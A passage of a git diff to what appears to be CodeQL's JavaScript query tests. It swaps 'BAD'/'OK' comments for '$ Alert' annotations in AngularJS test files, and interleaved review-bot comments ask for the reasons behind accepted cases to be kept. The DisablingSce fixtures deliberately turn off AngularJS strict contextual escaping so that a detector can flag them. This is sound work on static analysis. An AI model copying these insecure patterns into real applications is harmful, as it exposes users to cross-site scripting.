.../LanguageFeatures/SetterReturn/tst.js | 7 +- .../SpuriousArguments/es2015.js | 10 +- .../SpuriousArguments/globals.js | 8 +- .../SpuriousArguments/thisparameter.ts | 4 +- .../LanguageFeatures/SpuriousArguments/tst.js | 55 ++-- .../StrictModeCallStackIntrospection/tst.js | 20 +- .../TemplateSyntaxInStringLiteral.js | 4 +- .../YieldInNonGenerator/tst.js | 3 +- .../query-tests/NodeJS/DubiousImport/main.js | 2 +- .../NodeJS/DubiousImport/multi_import.js | 6 +- .../query-tests/NodeJS/InvalidExport/tst.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst2a.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2c.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst4.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst5.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst6.js | 2 +- .../query-tests/NodeJS/MissingExports/tst.js | 12 +- .../UnresolvableImport/src/sub/subsub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/sub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/tst.js | 22 +- .../NodeJS/UnresolvableImport/tst.js | 2 +- .../Performance/NonLocalForIn/tst.js | 21 +- .../ReassignParameterAndUseArguments/tst.js | 7 +- .../React/InconsistentStateUpdate/tst.js | 32 +- .../tst.js | 58 ++-- .../undefined.js | 62 ++-- .../UnusedOrUndefinedStateProperty/unused.js | 26 +- .../RegExp/BackrefBeforeGroup/tst.js | 14 +- .../BackrefIntoNegativeLookahead/tst.js | 5 +- .../DuplicateCharacterInCharacterClass/tst.js | 4 +- .../RegExp/IdentityReplacement/tst.js | 26 +- .../query-tests/RegExp/MalformedRegExp/tst.js | 2 +- .../RegExp/RegExpAlwaysMatches/tst.js | 38 +-- .../query-tests/RegExp/UnboundBackref/tst.js | 17 +- .../RegExp/UnmatchableCaret/tst.js | 26 +- .../RegExp/UnmatchableDollar/tst.js | 31 +- .../tst-IncompleteHostnameRegExp.js | 6 +- .../IncompleteUrlSchemeCheck.js | 4 +- .../tst-IncompleteUrlSubstringSanitization.js | 4 +- 
.../CWE-020/IncorrectSuffixCheck/tst.js | 48 +-- .../CWE-020/MissingOriginCheck/tst.js | 6 +- .../tst-SemiAnchoredRegExp.js | 56 ++-- .../tst-UnanchoredUrlRegExp.js | 84 ++--- .../CWE-020/SuspiciousRegexpRange/tst.js | 34 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 3 +- .../CWE-022/TaintedPath/TaintedPath.js | 147 ++++----- .../TaintedPath/examples/TaintedPath.js | 3 +- .../TaintedPath/examples/TaintedPathGood.js | 2 +- .../CWE-022/TaintedPath/handlebars.js | 10 +- .../CWE-022/TaintedPath/normalizedPaths.js | 208 ++++++------ .../CWE-022/TaintedPath/other-fs-libraries.js | 48 +-- .../Security/CWE-022/TaintedPath/prettier.js | 4 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 20 +- .../TaintedPath/tainted-array-steps.js | 4 +- .../TaintedPath/tainted-promise-steps.js | 4 +- .../CWE-022/TaintedPath/tainted-require.js | 7 +- .../CWE-022/TaintedPath/tainted-sendFile.js | 21 +- .../TaintedPath/tainted-string-steps.js | 38 +-- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 15 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipGood.js | 4 +- .../query-tests/Security/CWE-073/routes.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 16 +- .../test/query-tests/Security/CWE-073/tst2.js | 14 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 60 ++-- .../CWE-078/CommandInjection/exec-sh.js | 2 +- .../CWE-078/CommandInjection/exec-sh2.js | 2 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 14 +- .../CWE-078/CommandInjection/other.js | 40 +-- .../IndirectCommandInjection/actions.js | 10 +- ...ommand-line-parameter-command-injection.js | 76 ++--- .../second-order.js | 24 +- ...hell-command-injection-from-environment.js | 10 +- .../lib/isImported.js | 2 +- .../UnsafeShellCommandConstruction/lib/lib.js | 258 +++++++-------- .../lib/lib2.js | 4 +- 
.../lib/other.js | 2 +- .../lib/subLib/amdSub.js | 2 +- .../lib/subLib/index.js | 6 +- .../lib/subLib2/compiled-file.ts | 2 +- .../lib/subLib2/special-file.js | 2 +- .../lib/subLib3/my-file.ts | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-078/UselessUseOfCat/uselesscat.js | 98 +++--- .../CWE-079/DomBasedXss/addEventListener.js | 10 +- .../DomBasedXss/angular-tempate-url.js | 4 +- .../CWE-079/DomBasedXss/angular2-client.ts | 30 +- .../CWE-079/DomBasedXss/classnames.js | 16 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 12 +- .../CWE-079/DomBasedXss/custom-element.js | 2 +- .../Security/CWE-079/DomBasedXss/d3.js | 8 +- .../Security/CWE-079/DomBasedXss/dates.js | 34 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 10 +- .../Security/CWE-079/DomBasedXss/encodeuri.js | 2 +- .../DomBasedXss/event-handler-receiver.js | 2 +- .../Security/CWE-079/DomBasedXss/express.js | 5 +- .../Security/CWE-079/DomBasedXss/jquery.js | 42 +-- .../CWE-079/DomBasedXss/json-stringify.jsx | 8 +- .../CWE-079/DomBasedXss/jwt-server.js | 3 +- .../Security/CWE-079/DomBasedXss/jwt.js | 2 +- .../CWE-079/DomBasedXss/nodemailer.js | 4 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 22 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 4 +- .../CWE-079/DomBasedXss/react-use-context.js | 4 +- .../CWE-079/DomBasedXss/react-use-router.js | 10 +- .../CWE-079/DomBasedXss/react-use-state.js | 10 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 26 +- .../CWE-079/DomBasedXss/stored-xss.js | 16 +- .../DomBasedXss/string-manipulations.js | 22 +- .../tainted-url-suffix-arguments.js | 6 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 10 +- .../Security/CWE-079/DomBasedXss/translate.js | 5 +- .../CWE-079/DomBasedXss/trusted-types.js | 6 +- .../Security/CWE-079/DomBasedXss/tst.js | 279 ++++++++-------- .../Security/CWE-079/DomBasedXss/tst3.js | 16 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 20 +- 
.../Security/CWE-079/ExceptionXss/ajv.js | 4 +- .../CWE-079/ExceptionXss/exception-xss.js | 54 +-- .../CWE-079/ReflectedXss/ReflectedXss.js | 47 ++- .../ReflectedXss/ReflectedXssContentTypes.js | 18 +- .../CWE-079/ReflectedXss/ReflectedXssGood.js | 14 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 8 +- .../Security/CWE-079/ReflectedXss/cookies.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 6 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 10 +- .../Security/CWE-079/ReflectedXss/promises.js | 4 +- .../Security/CWE-079/ReflectedXss/tst2.js | 32 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 8 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 6 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 6 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- .../CWE-079/UnsafeHtmlConstruction/main.js | 42 +-- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 6 +- .../unsafe-jquery-plugin.js | 96 +++--- .../Security/CWE-079/XssThroughDom/angular.ts | 14 +- .../Security/CWE-079/XssThroughDom/forms.js | 24 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 84 ++--- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 6 +- .../Security/CWE-089/untyped/graphql.js | 26 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 16 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 14 +- .../CWE-089/untyped/marsdb-flow-to.js | 3 +- .../Security/CWE-089/untyped/marsdb.js | 3 +- .../Security/CWE-089/untyped/minimongo.js | 3 +- .../Security/CWE-089/untyped/mongodb.js | 31 +- .../CWE-089/untyped/mongodb_bodySafe.js | 5 +- .../Security/CWE-089/untyped/mongoose.js | 138 ++++---- .../CWE-089/untyped/mongooseJsonParse.js | 3 +- .../CWE-089/untyped/mongooseModelClient.js | 6 +- 
.../Security/CWE-089/untyped/mysql.js | 6 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 48 +-- .../Security/CWE-089/untyped/redis.js | 26 +- .../Security/CWE-089/untyped/tst2.js | 5 +- .../Security/CWE-089/untyped/tst3.js | 4 +- .../CodeInjection/NoSQLCodeInjection.js | 8 +- .../Security/CWE-094/CodeInjection/actions.js | 2 +- .../CWE-094/CodeInjection/angularjs.js | 42 +-- .../CodeInjection/bad-code-sanitization.js | 22 +- .../Security/CWE-094/CodeInjection/express.js | 29 +- .../CWE-094/CodeInjection/lib/index.js | 28 +- .../Security/CWE-094/CodeInjection/module.js | 4 +- .../CWE-094/CodeInjection/react-native.js | 4 +- .../CWE-094/CodeInjection/template-sinks.js | 28 +- .../Security/CWE-094/CodeInjection/tst.js | 33 +- .../CWE-094/CodeInjection/webix/webix.html | 6 +- .../CWE-094/CodeInjection/webix/webix.js | 6 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 10 +- .../Security/CWE-1004/tst-httpOnly.js | 74 ++--- .../Security/CWE-116/BadTagFilter/tst.js | 44 +-- .../Security/CWE-116/DoubleEscaping/tst.js | 6 +- .../UnsafeHtmlExpansion.js | 24 +- .../tst-multi-character-sanitization.js | 119 ++++--- .../CWE-116/IncompleteSanitization/tst.js | 214 ++++++------ .../Security/CWE-117/logInjectionBad.js | 46 +-- .../Security/CWE-117/logInjectionGood.js | 10 +- .../Security/CWE-1275/tst-sameSite.js | 30 +- .../test/query-tests/Security/CWE-134/tst.js | 44 +-- .../test/query-tests/Security/CWE-178/tst.js | 14 +- .../Security/CWE-200/bufferRead.js | 3 +- .../Security/CWE-200/express-send-file.js | 2 +- .../Security/CWE-200/googlecompiler.js | 5 +- .../query-tests/Security/CWE-200/lib/tst.js | 6 +- .../Security/CWE-200/private-file-exposure.js | 26 +- .../Security/CWE-200/readFileSync.js | 3 +- .../Security/CWE-200/readStreamRead.js | 3 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 4 +- .../Security/CWE-201/PostMessageStar2.js 
| 8 +- .../test/query-tests/Security/CWE-209/node.js | 4 +- .../test/query-tests/Security/CWE-209/tst.js | 12 +- .../test/query-tests/Security/CWE-295/tst.js | 44 +-- .../Security/CWE-312/CleartextStorage.js | 3 +- .../Security/CWE-312/CleartextStorageGood.js | 2 +- .../Security/CWE-312/build-leaks.js | 14 +- .../query-tests/Security/CWE-312/passwords.js | 124 +++---- .../Security/CWE-312/tst-angularjs.js | 14 +- .../test/query-tests/Security/CWE-326/tst.js | 38 +-- .../Security/CWE-327/bad-random.js | 42 +-- .../test/query-tests/Security/CWE-327/tst.js | 14 +- .../test/query-tests/Security/CWE-338/tst.js | 52 +-- .../test/query-tests/Security/CWE-346/tst.js | 22 +- .../query-tests/Security/CWE-347/bad-jwt.js | 8 +- .../Security/CWE-352/csurf_api_example.js | 2 +- .../Security/CWE-352/csurf_example.js | 4 +- .../query-tests/Security/CWE-352/fastify.js | 2 +- .../query-tests/Security/CWE-352/fastify2.js | 2 +- .../Security/CWE-352/lusca_example.js | 6 +- .../test/query-tests/Security/CWE-352/tst.js | 2 +- .../test/query-tests/Security/CWE-367/tst.js | 12 +- .../CWE-377/insecure-temporary-file.js | 16 +- .../test/query-tests/Security/CWE-384/tst.js | 6 +- .../DeepObjectResourceExhaustion/tst.js | 2 +- .../Security/CWE-400/ReDoS/jsonschema.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 2 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 2 +- .../Security/CWE-400/ReDoS/lib/lib.js | 14 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 2 +- .../ReDoS/lib/otherLib/js/src/index.js | 2 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 6 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 2 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 2 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 2 +- .../CWE-400/ReDoS/polynomial-redos.js | 196 +++++------ .../query-tests/Security/CWE-400/ReDoS/tst.js | 308 +++++++----------- 
.../CWE-400/RemovePropertyInjection/tst.js | 12 +- .../RemovePropertyInjection/tstNonExpr.js | 4 +- .../test/query-tests/Security/CWE-502/tst.js | 30 +- .../test/query-tests/Security/CWE-506/tst.js | 8 +- .../CWE-522-DecompressionBombs/fflate.js | 5 +- .../test/query-tests/Security/CWE-598/tst.js | 12 +- .../CWE-601/ClientSideUrlRedirect/react.js | 8 +- .../ClientSideUrlRedirect/regexp-exec.js | 16 +- .../ClientSideUrlRedirect/sanitizer.js | 24 +- .../CWE-601/ClientSideUrlRedirect/tst.js | 11 +- .../CWE-601/ClientSideUrlRedirect/tst10.js | 12 +- .../CWE-601/ClientSideUrlRedirect/tst11.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 40 +-- .../CWE-601/ClientSideUrlRedirect/tst14.js | 4 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 22 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 3 +- .../CWE-601/ClientSideUrlRedirect/tst3.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst4.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst5.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 9 +- .../CWE-601/ClientSideUrlRedirect/tst7.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst8.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst9.js | 3 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirect.js | 3 +- .../ServerSideUrlRedirectGood.js | 2 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 82 ++--- .../CWE-601/ServerSideUrlRedirect/koa.js | 16 +- .../CWE-601/ServerSideUrlRedirect/next.ts | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 14 +- .../ServerSideUrlRedirect/react-native.js | 4 +- .../query-tests/Security/CWE-611/closure.js | 2 +- .../query-tests/Security/CWE-611/domparser.js | 8 +- .../query-tests/Security/CWE-611/expat.js | 2 +- .../query-tests/Security/CWE-611/libxml.js | 2 +- .../Security/CWE-611/libxml.noent.js | 12 +- .../Security/CWE-614/tst-cleartextCookie.js | 62 ++-- .../test/query-tests/Security/CWE-640/tst.js | 8 +- .../Security/CWE-643/XpathInjectionBad.js | 3 +- 
.../Security/CWE-643/XpathInjectionGood.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 8 +- .../test/query-tests/Security/CWE-643/tst2.js | 4 +- .../Security/CWE-693/InsecureHelmetBad.js | 4 +- .../Security/CWE-693/InsecureHelmetGood.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 61 ++-- .../Security/CWE-730/RegExpInjectionGood.js | 2 +- .../Security/CWE-730/server-crash.js | 46 +-- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 10 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall3.js | 2 +- .../UnvalidatedDynamicMethodCallGood.js | 2 +- .../UnvalidatedDynamicMethodCallGood3.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 4 +- .../test/query-tests/Security/CWE-754/tst.js | 30 +- .../Security/CWE-770/MissingRateLimit/tst.js | 44 +-- .../Security/CWE-770/MissingRateLimit/tst2.ts | 2 +- .../Security/CWE-770/MissingRateLimit/tst3.js | 2 +- .../Security/CWE-770/MissingRateLimit/tst4.js | 2 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion_timeout_fixed.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 96 +++--- .../query-tests/Security/CWE-776/closure.js | 3 +- .../query-tests/Security/CWE-776/domparser.js | 9 +- .../query-tests/Security/CWE-776/expat.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 3 +- .../query-tests/Security/CWE-776/libxml.js | 3 +- .../Security/CWE-776/libxml.noent.js | 3 +- .../Security/CWE-776/libxml.sax.js | 2 +- .../Security/CWE-776/libxml.saxpush.js | 2 +- .../Security/CWE-798/HardcodedCredentials.js | 160 ++++----- .../__tests__/HardcodedCredentialsDemo.js | 8 +- .../Security/CWE-807/example_bypass.js | 9 +- .../tst-different-kinds-comparison-bypass.js | 18 +- .../test/query-tests/Security/CWE-807/tst.js | 42 +-- .../Security/CWE-829/insecure-download.js | 20 +- .../DynamicCreationOfUntrustedSourceUse.html | 20 +- .../StaticCreationOfUntrustedSourceUse.html | 21 +- 
.../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitGood.js | 8 +- .../CWE-834/LoopBoundInjectionGood.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../LoopBoundInjectionObviousLengthCheck.js | 2 +- .../LoopBoundInjectionObviousNullPointer.js | 10 +- ...jectionObviousNullPointerInPreviousLoop.js | 4 +- .../test/query-tests/Security/CWE-843/tst.js | 66 ++-- .../test/query-tests/Security/CWE-912/tst.js | 10 +- .../PrototypePollutingAssignment/lib.js | 30 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 60 ++-- .../path-assignment.js | 10 +- .../PrototypePollutingFunction/tests.js | 92 +++--- .../angularmerge.js | 2 +- .../src-non-vulnerable-lodash/tst.js | 2 +- .../src-vulnerable-lodash/tst.js | 8 +- .../webix/webix.html | 4 +- .../webix/webix.js | 4 +- .../test/query-tests/Security/CWE-916/tst.js | 8 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 54 +-- .../Statements/EphemeralLoop/tst.js | 10 +- .../Statements/IgnoreArrayResult/tst.js | 4 +- .../Statements/ImplicitReturn/tst.js | 25 +- .../InconsistentLoopOrientation/tst.js | 13 +- .../LoopIterationSkippedDueToShifting/tst.js | 12 +- .../Statements/NestedLoopsSameVariable/tst.js | 5 +- .../Statements/ReturnAssignsLocal/tst.js | 18 +- .../Statements/ReturnOutsideFunction/tst.js | 3 +- .../tst.js | 41 ++- .../UnreachableStatement/typealias.ts | 2 +- .../UseOfReturnlessFunction/tst.html | 2 +- .../Statements/UseOfReturnlessFunction/tst.js | 30 +- .../UseOfReturnlessFunction/tst2.ts | 2 +- .../UselessComparisonTest/constant.js | 4 +- .../UselessComparisonTest/defaults.js | 6 +- .../UselessComparisonTest/implicitReturn.js | 2 +- .../UselessConditional/UselessConditional.js | 56 ++-- .../UselessConditionalGood.js | 38 +-- javascript/ql/test/query-tests/Vue/tst.js | 16 +- 
.../external/DuplicateFunction/d/tst.js | 2 +-
536 files changed, 4420 insertions(+), 4774 deletions(-)
diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js
index d8616c9e2399..58b700a4c3f2 100644
--- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js
+++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js
@@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', 
cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js @@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js 
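Review bot: With the `// GOOD` and `// OK` markers removed, the hunk no longer records why `$scope.$on('$destroy', cleanup)` is accepted while `$scope.$on('destroy', cleanup)` is flagged, nor why the `$locationChangeStart`, `lib1.foo`, `lib2:foo` and `onClick` listeners are left alone. The `// OK - reason` form this commit uses in other files fits here, e.g. `$scope.$on('$destroy', cleanup); // OK - built-in AngularJS scope event` and `$scope.$on('lib1.foo', cleanup); // OK - presumably treated as a library event because of the namespace separator`. The second of those is an inference about the query's heuristics and should be confirmed against the query before it is written down.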
+++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js @@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js 
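Review bot: The second `.config` block, `.config(['otherProvider', function($sceProvider) {`, is the only case in the hunk whose parameter is named `$sceProvider` yet whose `enabled(false)` call carries no `$ Alert`, and the hunk now has no comment saying why. Array-notation injection binds the service named in the array, so the parameter name is irrelevant; `$sceProvider.enabled(false); // OK - array notation injects 'otherProvider', not $sceProvider` would keep that intent visible. The last case, `var x = false;` followed by `$sceProvider.enabled(x); // $ Alert`, could likewise say it pins flow through a local constant rather than a literal.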
@@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - 
.factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ 
